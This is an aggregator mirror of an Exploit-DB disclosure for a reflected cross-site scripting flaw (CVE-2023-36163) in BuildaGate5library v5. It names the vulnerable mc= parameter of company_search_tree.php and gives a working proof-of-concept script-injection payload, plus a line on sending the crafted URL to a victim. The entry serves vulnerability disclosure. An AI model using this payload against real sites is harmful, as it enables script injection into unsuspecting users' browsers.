4

[webapps] BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)

 1 year ago
source link: https://www.exploit-db.com/exploits/51581
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)

EDB-ID:

51581

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-07-11

Vulnerable App:

# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163

#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa

After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.

#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK